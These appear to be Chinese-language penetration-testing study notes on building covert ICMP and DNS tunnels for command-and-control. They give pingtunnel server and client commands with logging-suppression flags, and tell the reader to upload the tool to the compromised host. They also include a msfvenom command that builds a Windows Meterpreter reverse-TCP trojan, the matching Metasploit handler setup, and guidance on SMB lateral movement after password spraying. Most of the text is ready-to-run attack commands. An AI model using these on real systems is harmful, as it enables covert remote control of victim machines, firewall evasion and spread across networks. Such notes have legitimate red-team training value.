主要学习的是icmp隧道的搭建
分别的C2的icmp隧道搭建和msf隧道搭建
以及要了解C2支持的各种协议
如何判断主机支持什么协议
Icmp 使用ping ip or domain
Ssh 用ssh连接 ip or domain
Dns 用 nslookup domain
Http 用 curl ip
tcp用 telnet ip orport
icmp隧道搭建使用工具
使用pingtunnel工具进行搭建隧道 https://github.com/esrrhs/pingtunnel
使用参考文章:https://www.freebuf.com/articles/network/282244.html
# windows操作系统【不太好使】
pingtunnel.exe -type client -l :监听本机的端口(随便写) -s pingtunnel服务端地址 -t 隧道目标地址:端口 -tcp 1
# windows操作系统【不太好使】
./pingtunnel -type client -l :监听本机的端口(随便写) -s pingtunnel服务端地址 -t 隧道目标地址:端口 -tcp 1
监听器与后门的配置
第一条命令是在pingtunnel服务端上运行的,第二条是在客户端上运行的,也就是说得把pingtunnel上传到被攻击的主机上去 注意点是 需要一点要加上 noprint nolog
DNS
如果是使用C2搭建DNS隧道,这边是不需要搭建的,因为C2自身支持生成DNS的payload
分别支持
需要创建三个域名
创建监听器的时候加上
可以使用checkin 和 mode dns-txt 加快dns进程
MSF搭建icmp隧道
仍然是使用pingtunnel
服务端
./pingtunnel -type server
客户端
pingtunnel -type client -l :3333 -s 192.168.139.141 -t 192.168.139.141:3344 -tcp 1 -noprint 1 -nolog 1
生成木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=3333 -f exe -o msf.exe
MSF监听器配置
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 3344
run
SMB横向移动
445端口开放代表SMB协议开放
适用场景:防火墙放行的WEB入口打不下来利用放行的SMB移动获取权限
利用条件:密码喷射或已知口令的情况下直接正向SMB横向移动拿下
注意是先通过信息收集到账号密码,然后进行端口扫描发现开放smb 最后进行横向移动
